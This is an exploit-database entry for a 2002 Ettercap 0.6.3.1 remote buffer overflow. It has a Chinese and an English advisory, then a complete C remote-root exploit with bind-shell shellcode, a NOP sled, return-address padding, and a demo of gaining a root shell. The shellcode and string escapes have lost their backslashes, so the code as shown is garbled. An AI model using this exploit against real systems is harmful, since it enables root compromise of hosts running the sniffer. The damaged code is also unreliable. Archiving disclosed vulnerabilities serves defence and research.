https://www.exploit-db.com/exploits/21289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-113

Ettercap是Ettercap团队开发的一套基于Linux和BSD平台的多用途数据包嗅探程序，它支持创建和发送伪造的包、发送从网络适配器到应用软件各种级别的包、绑定监听数据到一个本地端口等。Ettercap在处理大数据包的实现上存在问题，远程攻击者可能利用这个漏洞在运行Ettercap的主机上执行任意指令。当Ettercap收到一个大的数据包并把它提交给解码程序解码时，可能发生缓冲区溢出问题，堆栈中的数据被改写，从而导致执行攻击者注入的任意指令。这种情况可能在Ettercap与一个MTU大于以太网标准值的网络接口相联系时或者Ettercap收到一个有伪造的包长度信息的数据包时发生。Ettercap通常情况下以root身份执行，并且之前版本的Ettercap也有可能受此漏洞的影响。

source: http://www.securityfocus.com/bid/4104/info

Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows.

A remotely exploitable buffer overflow condition exists in Ettercap. If a large packet is recieved and passed to some decoders, stack data may be overwritten, leading to execution of arbitrary code. This condition may be caused by associating Ettercap with an interface with a larger MTU than ethernet, or by sending a forged packet with a misleading data length field.

Ettercap would normally be executed by the root user. Earlier versions of Ettercap may share this vulnerability.

/* 
 * ettercap-0.6.3.1 remote root xploit 
 *
 * By: Ferm�n J. Serna <[email protected]>
 *     Next Generation Security Technologies
 *     http://www.ngsec.com
 *
 * DESCRIPTION:
 * ============
 *
 * Several decoders (mysql, irc, ...) suffer the following problem:
 *
 *    memcpy(collector, payload, data_to_ettercap->datalen);
 *
 * collector is declared as: 
 *
 *    u_char collector[MAX_DATA];
 * 
 *  where MAX_DATA is:
 *
 *  #define MAX_DATA 2000
 *
 *  So on interfaces where MTU is higher than 2000 you can exploit 
 *  ettercap. Nop, normal ethernets have MTU:1500 ;P
 *
 *  Here are common MTU and interface types:
 * 
 *    65535 Hyperchannel
 *    17914 16 Mbit/sec token ring
 *    8166  Token Bus (IEEE 802.4)
 *    4464  4 Mbit/sec token ring (IEEE 802.5)
 *    1500  Ethernet
 *    1500  PPP (typical; can vary widely)
 *
 *  Sample explotation could be also in loopback interfaces: MTU:16436
 *
 *  piscis:~# ettercap -NszC -i lo &
 *  [1] 21887
 *  piscis:~# ./ettercap-x 0 | nc localhost mysql
 *  ettercap-0.6.3.1 xploit by Ferm�n J. Serna <[email protected]>
 *  Next Generation Security Technologies
 *  http://www.ngsec.com   
 *
 *  punt!
 *  piscis:~# telnet localhost 36864
 *  Trying 127.0.0.1...
 *  Connected to localhost.
 *  Escape character is '^]'.
 *  id;
 *  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *  Madrid, 5/02/2002
 *
 */ 


#include <stdio.h>
#include <string.h>

#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0

char shellcode[]=
"x1bxebx78x5ex29xc0x89x46x10x40x89xc3x89x46x0cx40"
"x89x46x08x8dx4ex08xb0x66xcdx80xebx01x3Cx43xc6x46"
"x10x10x66x89x5ex14x88x46x08x29xc0x89xc2x89x46x18"
"xb0x90x66x89x46x16x8dx4ex14x89x4ex0cx8dx4ex08xb0"
"x66xcdx80x89x5ex0cx43x43xb0x66xcdx80x89x56x0cx89"
"x56x10xb0x66x43xcdx80xebx01x2Dx86xc3xb0x3fx29xc9"
"xcdx80xb0x3fx41xcdx80xb0x3fx41xcdx80x88x56x07x89"
"x76x0cx87xf3x8dx4bx0cxb0x0bxcdx80xe8x83xffxffxff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;

 fprintf(stderr,"ettercap-0.6.3.1 xploit by Ferm�n J. Serna <[email protected]>n");
 fprintf(stderr,"Next Generation Security Technologiesn");
 fprintf(stderr,"http://www.ngsec.comnn");


 if (argc==2) offset=atoi(argv[1]);

 memset(buffer,0,sizeof(buffer));

 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
 ch_ptr=(char *)lg_ptr;
 *ch_ptr='';
  
 printf("%s",buffer);

 return(0);

}

来源:BUGTRAQ
名称:20020213[NGSEC-2002-1]Ettercap,remoterootcompromise
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101370874219511&w;=2
来源:ettercap.sourceforge.net
链接:http://ettercap.sourceforge.net/index.php?s=history
来源:BID
名称:4104
链接:http://www.securityfocus.com/bid/4104
来源:XF
名称:ettercap-memcpy-bo(8200)
链接:http://www.iss.net/security_center/static/8200.php